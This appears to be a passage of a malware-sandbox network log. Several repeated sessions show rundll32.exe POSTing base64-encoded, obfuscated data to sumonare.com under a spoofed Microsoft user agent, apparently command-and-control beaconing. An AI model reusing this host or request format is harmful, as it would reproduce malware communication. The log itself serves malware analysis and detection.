                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:16.919987917 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:16 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                50192.168.2.749773194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:17.065334082 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:17.896672010 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:17 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                51192.168.2.749774194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:18.049910069 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:18.884561062 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:18 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                52192.168.2.749775194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:19.033206940 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:19.843302011 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:19 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                53192.168.2.749776194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:20.101640940 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:21.055948019 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:20 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                54192.168.2.749777194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:21.205653906 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:22.018162966 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:21 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                55192.168.2.749778194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:22.159178972 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:22.997498989 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:22 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                56192.168.2.749779194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:23.144635916 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:23.952955961 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:23 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                57192.168.2.749780194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:24.112477064 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:24.920526028 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:24 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                58192.168.2.749781194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:25.067128897 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:25.873049021 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:25 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                59192.168.2.749782194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:26.019856930 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:26.830004930 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:26 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                60192.168.2.749783194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:26.983823061 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
